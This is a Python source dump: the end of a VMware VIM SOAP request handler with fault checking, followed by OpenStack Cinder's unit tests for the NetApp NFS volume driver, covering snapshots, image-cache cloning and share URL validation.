missingSet. For example NotAuthenticated fault. The method raises
appropriate VimFaultException when an error is found.
:param response: Response from RetrievePropertiesEx API call
"""
fault_list = []
if not response:
# This is the case when the session has timed out. ESX SOAP
# server sends an empty RetrievePropertiesExResponse. Normally
# missingSet in the returnval field has the specifics about
# the error, but that's not the case with a timed out idle
# session. It is as bad as a terminated session for we cannot
# use the session. So setting fault to NotAuthenticated fault.
fault_list = [error_util.NOT_AUTHENTICATED]
else:
for obj_cont in response:
if hasattr(obj_cont, 'missingSet'):
for missing_elem in obj_cont.missingSet:
fault_type = missing_elem.fault.fault.__class__
# Fault needs to be added to the type of fault
# for uniformity in error checking as SOAP faults
# define
fault_list.append(fault_type.__name__)
if fault_list:
exc_msg_list = ', '.join(fault_list)
raise error_util.VimFaultException(fault_list,
_("Error(s): %s occurred "
"in the call to "
"RetrievePropertiesEx.") %
exc_msg_list)
def vim_request_handler(managed_object, **kwargs):
"""Handler for VI SDK calls.
Builds the SOAP message and parses the response for fault
checking and other errors.
:param managed_object:Managed object reference
:param kwargs: Keyword arguments of the call
:return: Response of the API call
"""
try:
if isinstance(managed_object, str):
# For strings use string value for value and type
# of the managed object.
managed_object = get_moref(managed_object, managed_object)
request = getattr(self.client.service, attr_name)
response = request(managed_object, **kwargs)
if (attr_name.lower() == 'retrievepropertiesex'):
retrieve_properties_ex_fault_checker(response)
return response
except error_util.VimFaultException as excep:
raise
except suds.WebFault as excep:
doc = excep.document
detail = doc.childAtPath('/Envelope/Body/Fault/detail')
fault_list = []
for child in detail.getChildren():
fault_list.append(child.get('type'))
raise error_util.VimFaultException(fault_list, excep)
except AttributeError as excep:
raise error_util.VimAttributeException(_("No such SOAP method "
"%(attr)s. Detailed "
"error: %(excep)s.") %
{'attr': attr_name,
'excep': excep})
except (httplib.CannotSendRequest,
httplib.ResponseNotReady,
httplib.CannotSendHeader) as excep:
raise error_util.SessionOverLoadException(_("httplib error in "
"%(attr)s: "
"%(excep)s.") %
{'attr': attr_name,
'excep': excep})
except (urllib2.URLError, urllib2.HTTPError) as excep:
raise error_util.VimConnectionException(
_("urllib2 error in %(attr)s: %(excep)s.") %
{'attr': attr_name,
'excep': excep})
except Exception as excep:
# Socket errors which need special handling for they
# might be caused by server API call overload
if (str(excep).find(ADDRESS_IN_USE_ERROR) != -1 or
str(excep).find(CONN_ABORT_ERROR)) != -1:
raise error_util.SessionOverLoadException(_("Socket error "
"in %(attr)s: "
"%(excep)s.") %
{'attr':
attr_name,
'excep': excep})
# Type error that needs special handling for it might be
# caused by server API call overload
elif str(excep).find(RESP_NOT_XML_ERROR) != -1:
raise error_util.SessionOverLoadException(_("Type error "
"in %(attr)s: "
"%(excep)s.") %
{'attr':
attr_name,
'excep': excep})
else:
raise error_util.VimException(_("Error in %(attr)s. "
"Detailed error: "
"%(excep)s.") %
{'attr': attr_name,
'excep': excep})
return vim_request_handler
def __repr__(self):
return "VIM Object."
def __str__(self):
return "VIM Object."
|
adelina-t/cinder | cinder/tests/test_netapp_nfs.py | <filename>cinder/tests/test_netapp_nfs.py
# Copyright (c) 2012 NetApp, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Unit tests for the NetApp-specific NFS driver module."""
from lxml import etree
import mock
import mox
from mox import IgnoreArg
from mox import IsA
import os
from cinder import context
from cinder import exception
from cinder.image import image_utils
from cinder.openstack.common.gettextutils import _
from cinder.openstack.common import log as logging
from cinder import test
from cinder.volume import configuration as conf
from cinder.volume.drivers.netapp import api
from cinder.volume.drivers.netapp import nfs as netapp_nfs
from cinder.volume.drivers.netapp import utils
from oslo.config import cfg
CONF = cfg.CONF
LOG = logging.getLogger(__name__)
def create_configuration():
configuration = mox.MockObject(conf.Configuration)
configuration.append_config_values(mox.IgnoreArg())
configuration.nfs_mount_point_base = '/mnt/test'
configuration.nfs_mount_options = None
return configuration
class FakeVolume(object):
def __init__(self, size=0):
self.size = size
self.id = hash(self)
self.name = None
def __getitem__(self, key):
return self.__dict__[key]
def __setitem__(self, key, val):
self.__dict__[key] = val
class FakeSnapshot(object):
def __init__(self, volume_size=0):
self.volume_name = None
self.name = None
self.volume_id = None
self.volume_size = volume_size
self.user_id = None
self.status = None
def __getitem__(self, key):
return self.__dict__[key]
class FakeResponse(object):
def __init__(self, status):
"""Initialize FakeResponse.
:param status: Either 'failed' or 'passed'
"""
self.Status = status
if status == 'failed':
self.Reason = 'Sample error'
class NetappDirectCmodeNfsDriverTestCase(test.TestCase):
"""Test direct NetApp C Mode driver."""
def setUp(self):
super(NetappDirectCmodeNfsDriverTestCase, self).setUp()
self._custom_setup()
def test_create_snapshot(self):
"""Test snapshot can be created and deleted."""
mox = self.mox
drv = self._driver
mox.StubOutWithMock(drv, '_clone_volume')
drv._clone_volume(IgnoreArg(), IgnoreArg(), IgnoreArg())
mox.ReplayAll()
drv.create_snapshot(FakeSnapshot())
mox.VerifyAll()
def test_create_volume_from_snapshot(self):
"""Tests volume creation from snapshot."""
drv = self._driver
mox = self.mox
volume = FakeVolume(1)
snapshot = FakeSnapshot(1)
location = '127.0.0.1:/nfs'
expected_result = {'provider_location': location}
mox.StubOutWithMock(drv, '_clone_volume')
mox.StubOutWithMock(drv, '_get_volume_location')
mox.StubOutWithMock(drv, 'local_path')
mox.StubOutWithMock(drv, '_discover_file_till_timeout')
mox.StubOutWithMock(drv, '_set_rw_permissions_for_all')
drv._clone_volume(IgnoreArg(), IgnoreArg(), IgnoreArg())
drv._get_volume_location(IgnoreArg()).AndReturn(location)
drv.local_path(IgnoreArg()).AndReturn('/mnt')
drv._discover_file_till_timeout(IgnoreArg()).AndReturn(True)
drv._set_rw_permissions_for_all(IgnoreArg())
mox.ReplayAll()
loc = drv.create_volume_from_snapshot(volume, snapshot)
self.assertEqual(loc, expected_result)
mox.VerifyAll()
def _prepare_delete_snapshot_mock(self, snapshot_exists):
drv = self._driver
mox = self.mox
mox.StubOutWithMock(drv, '_get_provider_location')
mox.StubOutWithMock(drv, '_volume_not_present')
mox.StubOutWithMock(drv, '_post_prov_deprov_in_ssc')
if snapshot_exists:
mox.StubOutWithMock(drv, '_execute')
mox.StubOutWithMock(drv, '_get_volume_path')
drv._get_provider_location(IgnoreArg())
drv._get_provider_location(IgnoreArg())
drv._volume_not_present(IgnoreArg(), IgnoreArg())\
.AndReturn(not snapshot_exists)
if snapshot_exists:
drv._get_volume_path(IgnoreArg(), IgnoreArg())
drv._execute('rm', None, run_as_root=True)
drv._post_prov_deprov_in_ssc(IgnoreArg())
mox.ReplayAll()
return mox
def test_delete_existing_snapshot(self):
drv = self._driver
mox = self._prepare_delete_snapshot_mock(True)
drv.delete_snapshot(FakeSnapshot())
mox.VerifyAll()
def test_delete_missing_snapshot(self):
drv = self._driver
mox = self._prepare_delete_snapshot_mock(False)
drv.delete_snapshot(FakeSnapshot())
mox.VerifyAll()
def _custom_setup(self):
kwargs = {}
kwargs['netapp_mode'] = 'proxy'
kwargs['configuration'] = create_configuration()
self._driver = netapp_nfs.NetAppDirectCmodeNfsDriver(**kwargs)
def test_check_for_setup_error(self):
mox = self.mox
drv = self._driver
required_flags = [
'netapp_transport_type',
'netapp_login',
'netapp_password',
'netapp_server_hostname',
'netapp_server_port']
# set required flags
for flag in required_flags:
setattr(drv.configuration, flag, None)
# check exception raises when flags are not set
self.assertRaises(exception.CinderException,
drv.check_for_setup_error)
# set required flags
for flag in required_flags:
setattr(drv.configuration, flag, 'val')
setattr(drv, 'ssc_enabled', False)
mox.StubOutWithMock(netapp_nfs.NetAppDirectNfsDriver, '_check_flags')
netapp_nfs.NetAppDirectNfsDriver._check_flags()
mox.ReplayAll()
drv.check_for_setup_error()
mox.VerifyAll()
# restore initial FLAGS
for flag in required_flags:
delattr(drv.configuration, flag)
def test_do_setup(self):
mox = self.mox
drv = self._driver
mox.StubOutWithMock(netapp_nfs.NetAppNFSDriver, 'do_setup')
mox.StubOutWithMock(drv, '_get_client')
mox.StubOutWithMock(drv, '_do_custom_setup')
netapp_nfs.NetAppNFSDriver.do_setup(IgnoreArg())
drv._get_client()
drv._do_custom_setup(IgnoreArg())
mox.ReplayAll()
drv.do_setup(IsA(context.RequestContext))
mox.VerifyAll()
def _prepare_clone_mock(self, status):
drv = self._driver
mox = self.mox
volume = FakeVolume()
setattr(volume, 'provider_location', '127.0.0.1:/nfs')
mox.StubOutWithMock(drv, '_get_host_ip')
mox.StubOutWithMock(drv, '_get_export_path')
mox.StubOutWithMock(drv, '_get_if_info_by_ip')
mox.StubOutWithMock(drv, '_get_vol_by_junc_vserver')
mox.StubOutWithMock(drv, '_clone_file')
mox.StubOutWithMock(drv, '_post_prov_deprov_in_ssc')
drv._get_host_ip(IgnoreArg()).AndReturn('127.0.0.1')
drv._get_export_path(IgnoreArg()).AndReturn('/nfs')
drv._get_if_info_by_ip('127.0.0.1').AndReturn(
self._prepare_info_by_ip_response())
drv._get_vol_by_junc_vserver('openstack', '/nfs').AndReturn('nfsvol')
drv._clone_file('nfsvol', 'volume_name', 'clone_name',
'openstack')
drv._post_prov_deprov_in_ssc(IgnoreArg())
return mox
def _prepare_info_by_ip_response(self):
res = """<attributes-list>
<net-interface-info>
<address>127.0.0.1</address>
<administrative-status>up</administrative-status>
<current-node>fas3170rre-cmode-01</current-node>
<current-port>e1b-1165</current-port>
<data-protocols>
<data-protocol>nfs</data-protocol>
</data-protocols>
<dns-domain-name>none</dns-domain-name>
<failover-group/>
<failover-policy>disabled</failover-policy>
<firewall-policy>data</firewall-policy>
<home-node>fas3170rre-cmode-01</home-node>
<home-port>e1b-1165</home-port>
<interface-name>nfs_data1</interface-name>
<is-auto-revert>false</is-auto-revert>
<is-home>true</is-home>
<netmask>255.255.255.0</netmask>
<netmask-length>24</netmask-length>
<operational-status>up</operational-status>
<role>data</role>
<routing-group-name>c10.63.165.0/24</routing-group-name>
<use-failover-group>disabled</use-failover-group>
<vserver>openstack</vserver>
</net-interface-info></attributes-list>"""
response_el = etree.XML(res)
return api.NaElement(response_el).get_children()
def test_clone_volume(self):
drv = self._driver
mox = self._prepare_clone_mock('pass')
mox.ReplayAll()
volume_name = 'volume_name'
clone_name = 'clone_name'
volume_id = volume_name + str(hash(volume_name))
share = 'ip:/share'
drv._clone_volume(volume_name, clone_name, volume_id, share)
mox.VerifyAll()
def test_register_img_in_cache_noshare(self):
volume = {'id': '1', 'name': 'testvol'}
volume['provider_location'] = '10.61.170.1:/share/path'
drv = self._driver
mox = self.mox
mox.StubOutWithMock(drv, '_do_clone_rel_img_cache')
drv._do_clone_rel_img_cache('testvol', 'img-cache-12345',
'10.61.170.1:/share/path',
'img-cache-12345')
mox.ReplayAll()
drv._register_image_in_cache(volume, '12345')
mox.VerifyAll()
def test_register_img_in_cache_with_share(self):
volume = {'id': '1', 'name': 'testvol'}
volume['provider_location'] = '10.61.170.1:/share/path'
drv = self._driver
mox = self.mox
mox.StubOutWithMock(drv, '_do_clone_rel_img_cache')
drv._do_clone_rel_img_cache('testvol', 'img-cache-12345',
'10.61.170.1:/share/path',
'img-cache-12345')
mox.ReplayAll()
drv._register_image_in_cache(volume, '12345')
mox.VerifyAll()
def test_find_image_in_cache_no_shares(self):
drv = self._driver
drv._mounted_shares = []
result = drv._find_image_in_cache('image_id')
if not result:
pass
else:
self.fail('Return result is unexpected')
def test_find_image_in_cache_shares(self):
drv = self._driver
mox = self.mox
drv._mounted_shares = ['testshare']
mox.StubOutWithMock(drv, '_get_mount_point_for_share')
mox.StubOutWithMock(os.path, 'exists')
drv._get_mount_point_for_share('testshare').AndReturn('/mnt')
os.path.exists('/mnt/img-cache-id').AndReturn(True)
mox.ReplayAll()
result = drv._find_image_in_cache('id')
(share, file_name) = result[0]
mox.VerifyAll()
drv._mounted_shares.remove('testshare')
if (share == 'testshare' and file_name == 'img-cache-id'):
pass
else:
LOG.warn(_("Share %(share)s and file name %(file_name)s")
% {'share': share, 'file_name': file_name})
self.fail('Return result is unexpected')
def test_find_old_cache_files_notexists(self):
drv = self._driver
mox = self.mox
cmd = ['find', '/mnt', '-maxdepth', '1', '-name',
'img-cache*', '-amin', '+720']
setattr(drv.configuration, 'expiry_thres_minutes', 720)
mox.StubOutWithMock(drv, '_get_mount_point_for_share')
mox.StubOutWithMock(drv, '_execute')
drv._get_mount_point_for_share(IgnoreArg()).AndReturn('/mnt')
drv._execute(*cmd, run_as_root=True).AndReturn((None, ''))
mox.ReplayAll()
res = drv._find_old_cache_files('share')
mox.VerifyAll()
if len(res) == 0:
pass
else:
self.fail('No files expected but got return values.')
def test_find_old_cache_files_exists(self):
drv = self._driver
mox = self.mox
cmd = ['find', '/mnt', '-maxdepth', '1', '-name',
'img-cache*', '-amin', '+720']
setattr(drv.configuration, 'expiry_thres_minutes', '720')
files = '/mnt/img-id1\n/mnt/img-id2\n'
r_files = ['img-id1', 'img-id2']
mox.StubOutWithMock(drv, '_get_mount_point_for_share')
mox.StubOutWithMock(drv, '_execute')
mox.StubOutWithMock(drv, '_shortlist_del_eligible_files')
drv._get_mount_point_for_share('share').AndReturn('/mnt')
drv._execute(*cmd, run_as_root=True).AndReturn((files, None))
drv._shortlist_del_eligible_files(
IgnoreArg(), r_files).AndReturn(r_files)
mox.ReplayAll()
res = drv._find_old_cache_files('share')
mox.VerifyAll()
if len(res) == len(r_files):
for f in res:
r_files.remove(f)
else:
self.fail('Returned files not same as expected.')
def test_delete_files_till_bytes_free_success(self):
drv = self._driver
mox = self.mox
files = [('img-cache-1', 230), ('img-cache-2', 380)]
mox.StubOutWithMock(drv, '_get_mount_point_for_share')
mox.StubOutWithMock(drv, '_delete_file')
drv._get_mount_point_for_share(IgnoreArg()).AndReturn('/mnt')
drv._delete_file('/mnt/img-cache-2').AndReturn(True)
drv._delete_file('/mnt/img-cache-1').AndReturn(True)
mox.ReplayAll()
drv._delete_files_till_bytes_free(files, 'share', bytes_to_free=1024)
mox.VerifyAll()
def test_clean_image_cache_exec(self):
drv = self._driver
mox = self.mox
drv.configuration.thres_avl_size_perc_start = 20
drv.configuration.thres_avl_size_perc_stop = 50
drv._mounted_shares = ['testshare']
mox.StubOutWithMock(drv, '_find_old_cache_files')
mox.StubOutWithMock(drv, '_delete_files_till_bytes_free')
mox.StubOutWithMock(drv, '_get_capacity_info')
drv._get_capacity_info('testshare').AndReturn((100, 19, 81))
drv._find_old_cache_files('testshare').AndReturn(['f1', 'f2'])
drv._delete_files_till_bytes_free(
['f1', 'f2'], 'testshare', bytes_to_free=31)
mox.ReplayAll()
drv._clean_image_cache()
mox.VerifyAll()
drv._mounted_shares.remove('testshare')
if not drv.cleaning:
pass
else:
self.fail('Clean image cache failed.')
def test_clean_image_cache_noexec(self):
drv = self._driver
mox = self.mox
drv.configuration.thres_avl_size_perc_start = 20
drv.configuration.thres_avl_size_perc_stop = 50
drv._mounted_shares = ['testshare']
mox.StubOutWithMock(drv, '_get_capacity_info')
drv._get_capacity_info('testshare').AndReturn((100, 30, 70))
mox.ReplayAll()
drv._clean_image_cache()
mox.VerifyAll()
drv._mounted_shares.remove('testshare')
if not drv.cleaning:
pass
else:
self.fail('Clean image cache failed.')
def test_clone_image_fromcache(self):
drv = self._driver
mox = self.mox
volume = {'name': 'vol', 'size': '20'}
mox.StubOutWithMock(drv, '_find_image_in_cache')
mox.StubOutWithMock(drv, '_do_clone_rel_img_cache')
mox.StubOutWithMock(drv, '_post_clone_image')
mox.StubOutWithMock(drv, '_is_share_vol_compatible')
drv._find_image_in_cache(IgnoreArg()).AndReturn(
[('share', 'file_name')])
drv._is_share_vol_compatible(IgnoreArg(), IgnoreArg()).AndReturn(True)
drv._do_clone_rel_img_cache('file_name', 'vol', 'share', 'file_name')
drv._post_clone_image(volume)
mox.ReplayAll()
drv.clone_image(volume, ('image_location', None), 'image_id', {})
mox.VerifyAll()
def get_img_info(self, format):
class img_info(object):
def __init__(self, fmt):
self.file_format = fmt
return img_info(format)
def test_clone_image_cloneableshare_nospace(self):
drv = self._driver
mox = self.mox
volume = {'name': 'vol', 'size': '20'}
mox.StubOutWithMock(drv, '_find_image_in_cache')
mox.StubOutWithMock(drv, '_is_cloneable_share')
mox.StubOutWithMock(drv, '_is_share_vol_compatible')
drv._find_image_in_cache(IgnoreArg()).AndReturn([])
drv._is_cloneable_share(IgnoreArg()).AndReturn('127.0.0.1:/share')
drv._is_share_vol_compatible(IgnoreArg(), IgnoreArg()).AndReturn(False)
mox.ReplayAll()
(prop, cloned) = drv. clone_image(
volume, ('nfs://127.0.0.1:/share/img-id', None), 'image_id', {})
mox.VerifyAll()
if not cloned and not prop['provider_location']:
pass
else:
self.fail('Expected not cloned, got cloned.')
def test_clone_image_cloneableshare_raw(self):
drv = self._driver
mox = self.mox
volume = {'name': 'vol', 'size': '20'}
mox.StubOutWithMock(drv, '_find_image_in_cache')
mox.StubOutWithMock(drv, '_is_cloneable_share')
mox.StubOutWithMock(drv, '_get_mount_point_for_share')
mox.StubOutWithMock(image_utils, 'qemu_img_info')
mox.StubOutWithMock(drv, '_clone_volume')
mox.StubOutWithMock(drv, '_discover_file_till_timeout')
mox.StubOutWithMock(drv, '_set_rw_permissions_for_all')
mox.StubOutWithMock(drv, '_resize_image_file')
mox.StubOutWithMock(drv, '_is_share_vol_compatible')
drv._find_image_in_cache(IgnoreArg()).AndReturn([])
drv._is_cloneable_share(IgnoreArg()).AndReturn('127.0.0.1:/share')
drv._is_share_vol_compatible(IgnoreArg(), IgnoreArg()).AndReturn(True)
drv._get_mount_point_for_share(IgnoreArg()).AndReturn('/mnt')
image_utils.qemu_img_info('/mnt/img-id').AndReturn(
self.get_img_info('raw'))
drv._clone_volume(
'img-id', 'vol', share='127.0.0.1:/share', volume_id=None)
drv._get_mount_point_for_share(IgnoreArg()).AndReturn('/mnt')
drv._discover_file_till_timeout(IgnoreArg()).AndReturn(True)
drv._set_rw_permissions_for_all('/mnt/vol')
drv._resize_image_file({'name': 'vol'}, IgnoreArg())
mox.ReplayAll()
drv. clone_image(
volume, ('nfs://127.0.0.1:/share/img-id', None), 'image_id', {})
mox.VerifyAll()
def test_clone_image_cloneableshare_notraw(self):
drv = self._driver
mox = self.mox
volume = {'name': 'vol', 'size': '20'}
mox.StubOutWithMock(drv, '_find_image_in_cache')
mox.StubOutWithMock(drv, '_is_cloneable_share')
mox.StubOutWithMock(drv, '_get_mount_point_for_share')
mox.StubOutWithMock(image_utils, 'qemu_img_info')
mox.StubOutWithMock(drv, '_clone_volume')
mox.StubOutWithMock(drv, '_discover_file_till_timeout')
mox.StubOutWithMock(drv, '_set_rw_permissions_for_all')
mox.StubOutWithMock(drv, '_resize_image_file')
mox.StubOutWithMock(image_utils, 'convert_image')
mox.StubOutWithMock(drv, '_register_image_in_cache')
mox.StubOutWithMock(drv, '_is_share_vol_compatible')
drv._find_image_in_cache(IgnoreArg()).AndReturn([])
drv._is_cloneable_share('nfs://127.0.0.1/share/img-id').AndReturn(
'127.0.0.1:/share')
drv._is_share_vol_compatible(IgnoreArg(), IgnoreArg()).AndReturn(True)
drv._get_mount_point_for_share('127.0.0.1:/share').AndReturn('/mnt')
image_utils.qemu_img_info('/mnt/img-id').AndReturn(
self.get_img_info('notraw'))
image_utils.convert_image(IgnoreArg(), IgnoreArg(), 'raw')
image_utils.qemu_img_info('/mnt/vol').AndReturn(
self.get_img_info('raw'))
drv._register_image_in_cache(IgnoreArg(), IgnoreArg())
drv._get_mount_point_for_share('127.0.0.1:/share').AndReturn('/mnt')
drv._discover_file_till_timeout(IgnoreArg()).AndReturn(True)
drv._set_rw_permissions_for_all('/mnt/vol')
drv._resize_image_file({'name': 'vol'}, IgnoreArg())
mox.ReplayAll()
drv. clone_image(
volume, ('nfs://127.0.0.1/share/img-id', None), 'image_id', {})
mox.VerifyAll()
def test_clone_image_file_not_discovered(self):
drv = self._driver
mox = self.mox
volume = {'name': 'vol', 'size': '20'}
mox.StubOutWithMock(drv, '_find_image_in_cache')
mox.StubOutWithMock(drv, '_is_cloneable_share')
mox.StubOutWithMock(drv, '_get_mount_point_for_share')
mox.StubOutWithMock(image_utils, 'qemu_img_info')
mox.StubOutWithMock(drv, '_clone_volume')
mox.StubOutWithMock(drv, '_discover_file_till_timeout')
mox.StubOutWithMock(image_utils, 'convert_image')
mox.StubOutWithMock(drv, '_register_image_in_cache')
mox.StubOutWithMock(drv, '_is_share_vol_compatible')
mox.StubOutWithMock(drv, 'local_path')
mox.StubOutWithMock(os.path, 'exists')
mox.StubOutWithMock(drv, '_delete_file')
drv._find_image_in_cache(IgnoreArg()).AndReturn([])
drv._is_cloneable_share('nfs://127.0.0.1/share/img-id').AndReturn(
'127.0.0.1:/share')
drv._is_share_vol_compatible(IgnoreArg(), IgnoreArg()).AndReturn(True)
drv._get_mount_point_for_share('127.0.0.1:/share').AndReturn('/mnt')
image_utils.qemu_img_info('/mnt/img-id').AndReturn(
self.get_img_info('notraw'))
image_utils.convert_image(IgnoreArg(), IgnoreArg(), 'raw')
image_utils.qemu_img_info('/mnt/vol').AndReturn(
self.get_img_info('raw'))
drv._register_image_in_cache(IgnoreArg(), IgnoreArg())
drv.local_path(IgnoreArg()).AndReturn('/mnt/vol')
drv._discover_file_till_timeout(IgnoreArg()).AndReturn(False)
drv.local_path(IgnoreArg()).AndReturn('/mnt/vol')
os.path.exists('/mnt/vol').AndReturn(True)
drv._delete_file('/mnt/vol')
mox.ReplayAll()
vol_dict, result = drv. clone_image(
volume, ('nfs://127.0.0.1/share/img-id', None), 'image_id', {})
mox.VerifyAll()
self.assertFalse(result)
self.assertFalse(vol_dict['bootable'])
self.assertIsNone(vol_dict['provider_location'])
def test_clone_image_resizefails(self):
drv = self._driver
mox = self.mox
volume = {'name': 'vol', 'size': '20'}
mox.StubOutWithMock(drv, '_find_image_in_cache')
mox.StubOutWithMock(drv, '_is_cloneable_share')
mox.StubOutWithMock(drv, '_get_mount_point_for_share')
mox.StubOutWithMock(image_utils, 'qemu_img_info')
mox.StubOutWithMock(drv, '_clone_volume')
mox.StubOutWithMock(drv, '_discover_file_till_timeout')
mox.StubOutWithMock(drv, '_set_rw_permissions_for_all')
mox.StubOutWithMock(drv, '_resize_image_file')
mox.StubOutWithMock(image_utils, 'convert_image')
mox.StubOutWithMock(drv, '_register_image_in_cache')
mox.StubOutWithMock(drv, '_is_share_vol_compatible')
mox.StubOutWithMock(drv, 'local_path')
mox.StubOutWithMock(os.path, 'exists')
mox.StubOutWithMock(drv, '_delete_file')
drv._find_image_in_cache(IgnoreArg()).AndReturn([])
drv._is_cloneable_share('nfs://127.0.0.1/share/img-id').AndReturn(
'127.0.0.1:/share')
drv._is_share_vol_compatible(IgnoreArg(), IgnoreArg()).AndReturn(True)
drv._get_mount_point_for_share('127.0.0.1:/share').AndReturn('/mnt')
image_utils.qemu_img_info('/mnt/img-id').AndReturn(
self.get_img_info('notraw'))
image_utils.convert_image(IgnoreArg(), IgnoreArg(), 'raw')
image_utils.qemu_img_info('/mnt/vol').AndReturn(
self.get_img_info('raw'))
drv._register_image_in_cache(IgnoreArg(), IgnoreArg())
drv.local_path(IgnoreArg()).AndReturn('/mnt/vol')
drv._discover_file_till_timeout(IgnoreArg()).AndReturn(True)
drv._set_rw_permissions_for_all('/mnt/vol')
drv._resize_image_file(
IgnoreArg(), IgnoreArg()).AndRaise(exception.InvalidResults())
drv.local_path(IgnoreArg()).AndReturn('/mnt/vol')
os.path.exists('/mnt/vol').AndReturn(True)
drv._delete_file('/mnt/vol')
mox.ReplayAll()
vol_dict, result = drv. clone_image(
volume, ('nfs://127.0.0.1/share/img-id', None), 'image_id', {})
mox.VerifyAll()
self.assertFalse(result)
self.assertFalse(vol_dict['bootable'])
self.assertIsNone(vol_dict['provider_location'])
def test_is_cloneable_share_badformats(self):
drv = self._driver
strgs = ['10.61.666.22:/share/img',
'nfs://10.61.666.22:/share/img',
'nfs://10.61.666.22//share/img',
'nfs://com.netapp.com:/share/img',
'nfs://com.netapp.com//share/img',
'com.netapp.com://share/im\g',
'http://com.netapp.com://share/img',
'nfs://com.netapp.com:/share/img',
'nfs://com.netapp.com:8080//share/img'
'nfs://com.netapp.com//img',
'nfs://[ae::sr::ty::po]/img']
for strg in strgs:
res = drv._is_cloneable_share(strg)
if res:
msg = 'Invalid format matched for url %s.' % strg
self.fail(msg)
def test_is_cloneable_share_goodformat1(self):
drv = self._driver
mox = self.mox
strg = 'nfs://10.61.222.333/share/img'
mox.StubOutWithMock(drv, '_check_share_in_use')
drv._check_share_in_use(IgnoreArg(), IgnoreArg()).AndReturn('share')
mox.ReplayAll()
drv._is_cloneable_share(strg)
mox.VerifyAll()
def test_is_cloneable_share_goodformat2(self):
drv = self._driver
mox = self.mox
strg = 'nfs://10.61.222.333:8080/share/img'
mox.StubOutWithMock(drv, '_check_share_in_use')
drv._check_share_in_use(IgnoreArg(), IgnoreArg()).AndReturn('share')
mox.ReplayAll()
drv._is_cloneable_share(strg)
mox.VerifyAll()
def test_is_cloneable_share_goodformat3(self):
drv = self._driver
mox = self.mox
strg = 'nfs://com.netapp:8080/share/img'
mox.StubOutWithMock(drv, '_check_share_in_use')
drv._check_share_in_use(IgnoreArg(), IgnoreArg()).AndReturn('share')
mox.ReplayAll()
drv._is_cloneable_share(strg)
mox.VerifyAll()
def test_is_cloneable_share_goodformat4(self):
drv = self._driver
mox = self.mox
strg = 'nfs://netapp.com/share/img'
mox.StubOutWithMock(drv, '_check_share_in_use')
drv._check_share_in_use(IgnoreArg(), IgnoreArg()).AndReturn('share')
mox.ReplayAll()
drv._is_cloneable_share(strg)
mox.VerifyAll()
def test_is_cloneable_share_goodformat5(self):
drv = self._driver
mox = self.mox
strg = 'nfs://netapp.com/img'
mox.StubOutWithMock(drv, '_check_share_in_use')
drv._check_share_in_use(IgnoreArg(), IgnoreArg()).AndReturn('share')
mox.ReplayAll()
drv._is_cloneable_share(strg)
mox.VerifyAll()
def test_check_share_in_use_no_conn(self):
drv = self._driver
share = drv._check_share_in_use(None, '/dir')
if share:
self.fail('Unexpected share detected.')
def test_check_share_in_use_invalid_conn(self):
drv = self._driver
share = drv._check_share_in_use(':8989', '/dir')
if share:
self.fail('Unexpected share detected.')
def test_check_share_in_use_incorrect_host(self):
drv = self._driver
mox = self.mox
mox.StubOutWithMock(utils, 'resolve_hostname')
utils.resolve_hostname(IgnoreArg()).AndRaise(Exception())
mox.ReplayAll()
share = drv._check_share_in_use('incorrect:8989', '/dir')
mox.VerifyAll()
if share:
self.fail('Unexpected share detected.')
def test_check_share_in_use_success(self):
drv = self._driver
mox = self.mox
drv._mounted_shares = ['127.0.0.1:/dir/share']
mox.StubOutWithMock(utils, 'resolve_hostname')
mox.StubOutWithMock(drv, '_share_match_for_ip')
utils.resolve_hostname(IgnoreArg()).AndReturn('10.22.33.44')
drv._share_match_for_ip(
'10.22.33.44', ['127.0.0.1:/dir/share']).AndReturn('share')
mox.ReplayAll()
share = drv._check_share_in_use('127.0.0.1:8989', '/dir/share')
mox.VerifyAll()
if not share:
self.fail('Expected share not detected')
def test_construct_image_url_loc(self):
drv = self._driver
img_loc = (None,
[{'metadata':
{'share_location': 'nfs://host/path',
'mount_point': '/opt/stack/data/glance',
'type': 'nfs'},
'url': 'file:///opt/stack/data/glance/image-id'}])
location = drv._construct_image_nfs_url(img_loc)
if location != "nfs://host/path/image-id":
self.fail("Unexpected direct url.")
def test_construct_image_url_direct(self):
drv = self._driver
img_loc = ("nfs://host/path/image-id", None)
location = drv._construct_image_nfs_url(img_loc)
if location != "nfs://host/path/image-id":
self.fail("Unexpected direct url.")
class NetappDirectCmodeNfsDriverOnlyTestCase(test.TestCase):
"""Test direct NetApp C Mode driver only and not inherit."""
def setUp(self):
super(NetappDirectCmodeNfsDriverOnlyTestCase, self).setUp()
self._custom_setup()
def _custom_setup(self):
kwargs = {}
kwargs['netapp_mode'] = 'proxy'
kwargs['configuration'] = create_configuration()
self._driver = netapp_nfs.NetAppDirectCmodeNfsDriver(**kwargs)
self._driver.ssc_enabled = True
self._driver.configuration.netapp_copyoffload_tool_path = 'cof_path'
@mock.patch.object(netapp_nfs, 'get_volume_extra_specs')
def test_create_volume(self, mock_volume_extra_specs):
drv = self._driver
drv.ssc_enabled = False
extra_specs = {}
mock_volume_extra_specs.return_value = extra_specs
fake_share = 'localhost:myshare'
with mock.patch.object(drv, '_ensure_shares_mounted'):
with mock.patch.object(drv, '_find_shares',
return_value=['localhost:myshare']):
with mock.patch.object(drv, '_do_create_volume'):
volume_info = self._driver.create_volume(FakeVolume(1))
self.assertEqual(volume_info.get('provider_location'),
fake_share)
@mock.patch.object(netapp_nfs, 'get_volume_extra_specs')
def test_create_volume_with_qos_policy(self, mock_volume_extra_specs):
drv = self._driver
drv.ssc_enabled = False
extra_specs = {'netapp:qos_policy_group': 'qos_policy_1'}
fake_volume = FakeVolume(1)
fake_share = 'localhost:myshare'
fake_qos_policy = 'qos_policy_1'
mock_volume_extra_specs.return_value = extra_specs
with mock.patch.object(drv, '_ensure_shares_mounted'):
with mock.patch.object(drv, '_find_shares',
return_value=['localhost:myshare']):
with mock.patch.object(drv, '_do_create_volume'):
with mock.patch.object(drv,
'_set_qos_policy_group_on_volume'
) as mock_set_qos:
volume_info = self._driver.create_volume(fake_volume)
self.assertEqual(volume_info.get('provider_location'),
'localhost:myshare')
mock_set_qos.assert_called_once_with(fake_volume,
fake_share,
fake_qos_policy)
